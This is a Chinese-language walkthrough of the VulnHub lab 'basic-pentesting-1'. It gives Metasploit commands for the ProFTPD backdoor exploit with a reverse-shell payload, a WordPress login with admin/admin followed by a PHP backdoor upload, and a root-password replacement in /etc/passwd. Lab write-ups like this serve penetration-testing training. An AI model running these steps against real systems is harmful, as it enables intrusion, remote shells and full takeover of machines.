原文地址:https://www.payload.com.cn/
basic-pentesting-1
下载地址:
https://www.vulnhub.com/entry/basic-pentesting-1,216/
提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/11609409
提权辅助工具linuxprivchecker下载:https://download.csdn.net/download/weixin_41082546/11609428
获取ip地址
端口扫描,服务识别
根据服务版本搜索相关漏洞
通过查看漏洞利用代码我们知道该漏洞利用模块在msf中已有
于是使用msf 搜索漏洞模块并利用
use exploit/unix/ftp/proftpd_133c_backdoor
set rhosts 192.168.88.197
set lhost 192.168.88.174
set payload cmd/unix/reverse
exploit
直接获得root权限。
当然还有一个80端口,我们也可以尝试从web去突破
尝试发现一些目录
dirb http://192.168.88.197
在目录/secret/ 下是wordpress 网站
尝试访问,发现存在页面重定向
将网站ip 域名 写入本地hosts 文件,重新访问网站
熟悉的界面
直接进入后台登录界面
直接admin、admin 弱口令进入后台管理界面,免去了爆破的麻烦!
在获得访问权限的前提下通过msf 上传 shellcode
use exploit/unix/webapp/wp_admin_shell_upload
set lhost 192.168.88.174
set rhost 192.168.88.197
set targeturi /secret/
set username admin
set password admin
exploit
可以看到成功上传了php后门,并获得web权限
接下来提权
可以使用linuxprivchecker: https://www.securitysift.com/download/linuxprivchecker.py
具体细节可以参考: https://www.freebuf.com/articles/system/129549.html
meterpreter > edit /etc/passwd meterpreter 下的edit 类似vim ,并且我们可以编辑/etc/psswd
root:x:0:0:root:/root:/bin/bash 第二位x 是密码占位符,密码加密存储在/etc/shadow,
我们可以假设,此处x 位 密码存在,那么root 就会默认密码为x位。就不会去读取/etc/shadow.
生成密码
openssl passwd -1
密码:admin
$1$ke/.AFq7$ykvmZ9loFhFpsOCZfJ84q1
用生成的密码替换 root的密码
:wq! 保存
shell
进入完整性shell
python -c 'import pty; pty.spawn("/bin/bash")'
su root
输入密码 admin
获取root权限